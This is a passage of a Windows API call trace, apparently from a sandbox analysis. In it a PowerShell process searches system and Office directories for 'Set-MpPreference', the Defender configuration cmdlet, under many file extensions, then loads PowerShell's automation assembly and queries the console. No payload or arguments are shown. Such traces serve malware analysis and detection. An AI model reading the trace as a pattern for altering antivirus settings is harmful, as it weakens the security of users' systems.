lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JS", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.258] GetLastError () returned 0x2 [0150.258] SetErrorMode (uMode=0x1) returned 0x1 [0150.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.258] GetLastError () returned 0x2 [0150.258] SetErrorMode (uMode=0x1) returned 0x1 [0150.259] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JSE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.259] GetLastError () returned 0x2 [0150.259] SetErrorMode (uMode=0x1) returned 0x1 [0150.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.259] GetLastError () returned 0x2 [0150.259] SetErrorMode (uMode=0x1) returned 0x1 [0150.259] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSF", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.259] GetLastError () returned 0x2 [0150.259] SetErrorMode (uMode=0x1) returned 0x1 [0150.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.259] GetLastError () returned 0x2 [0150.259] SetErrorMode (uMode=0x1) returned 0x1 [0150.259] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSH", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.260] GetLastError () returned 0x2 [0150.260] SetErrorMode (uMode=0x1) returned 0x1 [0150.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.260] GetLastError () returned 0x2 [0150.260] SetErrorMode (uMode=0x1) returned 0x1 [0150.260] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.MSC", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.260] GetLastError () returned 0x2 [0150.260] SetErrorMode (uMode=0x1) returned 0x1 [0150.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.260] GetLastError () returned 0x2 [0150.260] SetErrorMode (uMode=0x1) returned 0x1 [0150.260] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.260] GetLastError () returned 0x2 [0150.261] SetErrorMode (uMode=0x1) returned 0x1 [0150.261] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0150.261] GetLastError () returned 0x2 [0150.261] SetErrorMode (uMode=0x1) returned 0x1 [0150.261] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.ps1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.262] GetLastError () returned 0x2 [0150.262] SetErrorMode (uMode=0x1) returned 0x1 [0150.262] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0150.262] GetLastError () returned 0x2 [0150.262] SetErrorMode (uMode=0x1) returned 0x1 [0150.262] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.psm1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.263] GetLastError () returned 0x2 [0150.263] SetErrorMode (uMode=0x1) returned 0x1 [0150.263] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0150.263] GetLastError () returned 0x2 [0150.263] SetErrorMode (uMode=0x1) returned 0x1 [0150.264] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.psd1", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.265] GetLastError () returned 0x2 [0150.265] SetErrorMode (uMode=0x1) returned 0x1 [0150.265] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0150.265] GetLastError () returned 0x2 [0150.265] SetErrorMode (uMode=0x1) returned 0x1 [0150.265] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.COM", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.267] GetLastError () returned 0x2 [0150.267] SetErrorMode (uMode=0x1) returned 0x1 [0150.267] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0150.267] GetLastError () returned 0x2 [0150.267] SetErrorMode (uMode=0x1) returned 0x1 [0150.267] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.EXE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.268] GetLastError () returned 0x2 [0150.269] SetErrorMode (uMode=0x1) returned 0x1 [0150.269] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0150.269] GetLastError () returned 0x2 [0150.269] SetErrorMode (uMode=0x1) returned 0x1 [0150.269] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.BAT", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.270] GetLastError () returned 0x2 [0150.270] SetErrorMode (uMode=0x1) returned 0x1 [0150.270] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0150.270] GetLastError () returned 0x2 [0150.270] SetErrorMode (uMode=0x1) returned 0x1 [0150.270] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.CMD", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.272] GetLastError () returned 0x2 [0150.272] SetErrorMode (uMode=0x1) returned 0x1 [0150.272] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0150.272] GetLastError () returned 0x2 [0150.272] SetErrorMode (uMode=0x1) returned 0x1 [0150.272] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.VBS", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.274] GetLastError () returned 0x2 [0150.274] SetErrorMode (uMode=0x1) returned 0x1 [0150.274] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0150.274] GetLastError () returned 0x2 [0150.274] SetErrorMode (uMode=0x1) returned 0x1 [0150.274] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.VBE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.275] GetLastError () returned 0x2 [0150.275] SetErrorMode (uMode=0x1) returned 0x1 [0150.276] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0150.276] GetLastError () returned 0x2 [0150.276] SetErrorMode (uMode=0x1) returned 0x1 [0150.276] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.JS", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.277] GetLastError () returned 0x2 [0150.277] SetErrorMode (uMode=0x1) returned 0x1 [0150.277] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0150.277] GetLastError () returned 0x2 [0150.277] SetErrorMode (uMode=0x1) returned 0x1 [0150.277] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.JSE", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.279] GetLastError () returned 0x2 [0150.279] SetErrorMode (uMode=0x1) returned 0x1 [0150.279] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0150.279] GetLastError () returned 0x2 [0150.279] SetErrorMode (uMode=0x1) returned 0x1 [0150.279] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.WSF", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.281] GetLastError () returned 0x2 [0150.281] SetErrorMode (uMode=0x1) returned 0x1 [0150.281] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0150.281] GetLastError () returned 0x2 [0150.281] SetErrorMode (uMode=0x1) returned 0x1 [0150.281] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.WSH", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.283] GetLastError () returned 0x2 [0150.283] SetErrorMode (uMode=0x1) returned 0x1 [0150.283] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0150.283] GetLastError () returned 0x2 [0150.283] SetErrorMode (uMode=0x1) returned 0x1 [0150.283] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.MSC", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.296] GetLastError () returned 0x2 [0150.296] SetErrorMode (uMode=0x1) returned 0x1 [0150.296] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x5f5eda0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0150.296] GetLastError () returned 0x2 [0150.296] SetErrorMode (uMode=0x1) returned 0x1 [0150.297] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference", lpFindFileData=0x3b7120 | out: lpFindFileData=0x3b7120) returned 0xffffffff [0150.298] GetLastError () returned 0x2 [0150.298] SetErrorMode (uMode=0x1) returned 0x1 [0150.300] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.301] GetLastError () returned 0xcb [0150.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5f5ee2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.301] GetLastError () returned 0x2 [0150.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5f5eddc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.301] GetLastError () returned 0x2 [0150.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5f5eddc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.302] GetLastError () returned 0x2 [0150.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5f5eddc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.302] GetLastError () returned 0x2 [0150.376] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.376] GetLastError () returned 0xcb [0150.879] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.879] GetLastError () returned 0xcb [0150.883] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.883] GetLastError () returned 0xcb [0150.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.983] GetLastError () returned 0xcb [0150.988] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.988] GetLastError () returned 0xcb [0150.989] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.989] GetLastError () returned 0xcb [0151.004] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.004] GetLastError () returned 0xcb [0151.124] VirtualQuery (in: lpAddress=0x5f5de2c, lpBuffer=0x5f5ee2c, dwLength=0x1c | out: lpBuffer=0x5f5ee2c*(BaseAddress=0x5f5d000, AllocationBase=0x55d0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.208] GetLastError () returned 0xcb [0151.394] VirtualQuery (in: lpAddress=0x5f5de2c, lpBuffer=0x5f5ee2c, dwLength=0x1c | out: lpBuffer=0x5f5ee2c*(BaseAddress=0x5f5d000, AllocationBase=0x55d0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5f5e460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.409] GetLastError () returned 0xcb [0151.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5f5e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.409] GetLastError () returned 0xcb [0151.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5f5e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.409] GetLastError () returned 0xcb [0151.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5f5e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.409] GetLastError () returned 0xcb [0151.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5f5e460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.505] GetLastError () returned 0xcb [0151.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5f5e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.505] GetLastError () returned 0xcb [0151.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5f5e410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.505] GetLastError () returned 0xcb [0151.699] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0151.699] GetLastError () returned 0xcb [0151.699] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5f5e970 | out: lpConsoleScreenBufferInfo=0x5f5e970) returned 1 [0151.699] GetLastError () returned 0xcb [0151.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.768] GetLastError () returned 0xcb [0151.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5f5e470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.792] GetLastError () returned 0xcb [0151.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5f5e470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.792] GetLastError () returned 0xcb [0151.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5f5e470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.792] GetLastError () returned 0xcb [0151.981] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b4440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.981] GetLastError () returned 0xcb [0152.107] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0152.116] GetLastError () returned 0xcb [0152.116] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x5f5f084 | out: lpConsoleScreenBufferInfo=0x5f5f084) returned 1 [0152.116] GetLastError () returned 0xcb [0152.310] GetConsoleOutputCP () returned 0x1b5 [0152.312] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efe0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efe0) returned 0 [0152.328] GetLastError () returned 0xcb [0152.328] GetConsoleOutputCP () returned 0x1b5 [0152.328] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efe0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efe0) returned 0 [0152.328] GetLastError () returned 0xcb [0152.328] GetConsoleOutputCP () returned 0x1b5 [0152.329] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.329] GetLastError () returned 0xcb [0152.329] GetConsoleOutputCP () returned 0x1b5 [0152.329] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.329] GetLastError () returned 0xcb [0152.329] GetConsoleOutputCP () returned 0x1b5 [0152.329] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.329] GetLastError () returned 0xcb [0152.329] GetConsoleOutputCP () returned 0x1b5 [0152.329] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.329] GetLastError () returned 0xcb [0152.329] GetConsoleOutputCP () returned 0x1b5 [0152.329] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.329] GetLastError () returned 0xcb [0152.329] GetConsoleOutputCP () returned 0x1b5 [0152.329] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.329] GetLastError () returned 0xcb [0152.329] GetConsoleOutputCP () returned 0x1b5 [0152.329] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.329] GetLastError () returned 0xcb [0152.330] GetConsoleOutputCP () returned 0x1b5 [0152.330] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.330] GetLastError () returned 0xcb [0152.330] GetConsoleOutputCP () returned 0x1b5 [0152.330] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.330] GetLastError () returned 0xcb [0152.330] GetConsoleOutputCP () returned 0x1b5 [0152.330] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.330] GetLastError () returned 0xcb [0152.330] GetConsoleOutputCP () returned 0x1b5 [0152.330] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.330] GetLastError () returned 0xcb [0152.330] GetConsoleOutputCP () returned 0x1b5 [0152.330] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.330] GetLastError () returned 0xcb [0152.330] GetConsoleOutputCP () returned 0x1b5 [0152.330] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.331] GetLastError () returned 0xcb [0152.331] GetConsoleOutputCP () returned 0x1b5 [0152.331] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.331] GetLastError () returned 0xcb [0152.331] GetConsoleOutputCP () returned 0x1b5 [0152.331] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.331] GetLastError () returned 0xcb [0152.331] GetConsoleOutputCP () returned 0x1b5 [0152.331] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.331] GetLastError () returned 0xcb [0152.331] GetConsoleOutputCP () returned 0x1b5 [0152.331] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.331] GetLastError () returned 0xcb [0152.331] GetConsoleOutputCP () returned 0x1b5 [0152.331] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.331] GetLastError () returned 0xcb [0152.331] GetConsoleOutputCP () returned 0x1b5 [0152.331] 